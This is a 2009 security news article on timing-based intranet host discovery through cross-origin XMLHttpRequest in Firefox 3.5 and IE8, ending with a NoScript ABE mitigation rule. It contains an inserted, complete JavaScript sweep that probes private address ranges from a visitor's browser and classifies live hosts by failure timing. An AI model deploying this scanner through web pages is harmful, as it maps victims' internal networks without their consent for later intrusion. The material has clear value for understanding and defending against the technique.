July 22nd, 2009, 09:34 GMT

Firefox 3.5 and IE8 Abused to Spy Inside Intranets

Remote intranet Web server mapping via XMLHttpRequest
Two security researchers have devised proof-of-concept "ping sweeping" attacks that leverage the new Cross-Origin Resource Sharing implementation in Firefox 3.5, as well as the one already present in Internet Explorer 8. A design weakness allows an attacker to remotely map web servers on an internal network, using the timing of HTTP requests as a substitute for pings.

XMLHttpRequest is the API that AJAX libraries use to send HTTP requests directly to a web server and hand the response, as XML or plain text, back to the script. In earlier browsers, XMLHttpRequest was bound by the JavaScript same-origin policy: a page could only send HTTP or HTTPS requests to the origin (scheme, host and port) it was loaded from.

All of that changed with the introduction of the Cross-Origin Resource Sharing (CORS) specification, which allows such requests to be made cross-site. For security purposes, the browser attaches an Origin header to the request and the server states, through an Access-Control-Allow-Origin header, which origins may read the response; the browser enforces that decision by withholding the response from the script. The important detail is that this check is applied to the response, after the request has already left the browser.

However, as well-known Web security researcher Robert "RSnake" Hansen points out, even if such resource-access restrictions are in place, the ability to make the request itself can be abused. "Although an attacker is not allowed to know if the page was there or not (only if it was allowed to see the content or not), the attacker is still allowed to make an initial request. In doing so that initial request can be used as a pseudo 'ping' sweep," he explains.

Obviously, this is not a real ICMP ping but an HTTP variant, which can still be used to "tell if the site is there or not because it will either return immediately […] or it will wait around much longer […] before the browser gives up." By leveraging this architectural weak spot, Hansen claims, a "substantial amount of internal address space" can be scanned for web servers rather quickly.

To demonstrate the idea, the researcher has published a PoC page that scans a small range of intranet IP addresses when the visiting client sits behind a local router. It is also worth noting that port 80 does not need to be open on a target for it to be detected: a host with the port closed refuses the connection right away, which is still a fast failure, whereas an unused address produces no answer at all until the browser gives up.
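As an added example (not the researchers' PoC, which the article does not reproduce), here is how such a timing-based sweep can be written against XMLHttpRequest. The request is sent regardless of CORS; only the response is hidden, so the time until the request fails is the signal. The timeout and threshold values, the helper names and the simulated probe used to run the sweep offline are all assumptions of this example.

```javascript
// Added example: timing-based "HTTP ping" sweep over a private address range
// using cross-origin XMLHttpRequest. The CORS check only stops the script from
// READING the response; the request itself is always sent.
//
// Assumptions (hypothetical tuning, not from the article):
//   - a live host answers (CORS denial, 403/404, or a TCP reset on a closed
//     port) well within ALIVE_THRESHOLD_MS
//   - an unused address never answers and the probe is aborted at PROBE_TIMEOUT_MS
const PROBE_TIMEOUT_MS = 2000;
const ALIVE_THRESHOLD_MS = 1000;

// Browser-side probe. Resolves with an outcome and the elapsed time; never rejects.
// A setTimeout watchdog is used instead of xhr.timeout so it also works on
// browsers of the Firefox 3.5 / IE8 era.
function probeWithXhr(url, timeoutMs = PROBE_TIMEOUT_MS) {
  return new Promise((resolve) => {
    const start = Date.now();
    let settled = false;
    const finish = (outcome) => {
      if (settled) return;
      settled = true;
      clearTimeout(watchdog);
      resolve({ url, outcome, elapsedMs: Date.now() - start });
    };
    const xhr = new XMLHttpRequest();
    const watchdog = setTimeout(() => { xhr.abort(); finish('timeout'); }, timeoutMs);
    xhr.onload = () => finish('load');   // server allowed our origin (rare on an intranet)
    xhr.onerror = () => finish('error'); // CORS denied OR connection refused: something is there
    xhr.onabort = () => finish('timeout');
    xhr.open('GET', url, true);
    xhr.send(null);
  });
}

// Turn one probe result into a verdict. A fast failure means something at that
// address answered the TCP connection or the HTTP request.
function classify(result, thresholdMs = ALIVE_THRESHOLD_MS) {
  if (result.outcome === 'timeout') return 'no-host';
  if (result.elapsedMs < thresholdMs) return 'host-up';
  return 'unknown'; // slow error: filtered port or lossy link, do not guess
}

// Expand "192.168.1." + [first..last] into probe URLs. Port 80 need not be
// open on the target: a closed port still fails fast.
function targetUrls(prefix, first, last, port = 80) {
  const urls = [];
  for (let i = first; i <= last; i++) urls.push(`http://${prefix}${i}:${port}/`);
  return urls;
}

// Run the probes with bounded concurrency so the browser's connection limit
// does not inflate the timings of queued requests.
async function sweep(urls, probe, concurrency = 6) {
  const results = new Array(urls.length);
  let next = 0;
  async function worker() {
    while (next < urls.length) {
      const i = next++;
      results[i] = await probe(urls[i]);
    }
  }
  await Promise.all(Array.from({ length: Math.min(concurrency, urls.length) }, worker));
  return results.map((r) => ({ url: r.url, verdict: classify(r) }));
}

function liveHosts(verdicts) {
  return verdicts.filter((v) => v.verdict === 'host-up').map((v) => v.url);
}

// Constructed stand-in for the network so the sweep can run offline: listed
// hosts "answer" with a fast error (CORS denial), everything else hangs.
function makeSimulatedProbe(liveUrls, liveDelayMs = 30) {
  const live = new Set(liveUrls);
  return (url) => new Promise((resolve) => {
    const outcome = live.has(url) ? 'error' : 'timeout';
    const elapsedMs = live.has(url) ? liveDelayMs : PROBE_TIMEOUT_MS;
    setTimeout(() => resolve({ url, outcome, elapsedMs }), 1);
  });
}

// Demo on constructed data; in a browser, pass probeWithXhr instead.
const demoUrls = targetUrls('192.168.1.', 1, 8);
const demoProbe = makeSimulatedProbe(['http://192.168.1.1:80/', 'http://192.168.1.5:80/']);
sweep(demoUrls, demoProbe).then((v) => console.log('live:', liveHosts(v)));
```

The verdict depends entirely on the gap between a fast failure and the watchdog timeout, so the threshold has to be tuned to the victim's network; on a slow or lossy link the 'unknown' bucket grows and the scan loses precision rather than producing false positives.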

Fortunately, the popular NoScript Firefox extension mitigates the issue through its ABE (Application Boundaries Enforcer) component, whose default ruleset stops Internet sites from requesting LAN resources. Blocking JavaScript on untrusted sites, which NoScript does by default, also prevents the attack, since the sweep is driven by script.
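For reference, this is the shape of the ABE rule that covers the case above (an added illustration of ABE's rule syntax, not something quoted by the article): requests to LOCAL addresses are accepted only when they originate from LOCAL, and denied otherwise.

```text
# ABE ruleset (NoScript): allow LAN resources to be fetched only by LAN pages
Site LOCAL
Accept from LOCAL
Deny
```

With such a rule, a cross-origin XMLHttpRequest from an Internet page to an intranet address is stopped before it is sent, which removes the timing signal the sweep relies on.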

Internet Explorer 8 has its own proprietary variant of XMLHttpRequest, called XDomainRequest, built on the same Cross-Origin Resource Sharing headers. Inspired by RSnake's idea, another application security researcher, going by the online handle Inferno, has devised a similar attack against Microsoft's browser.
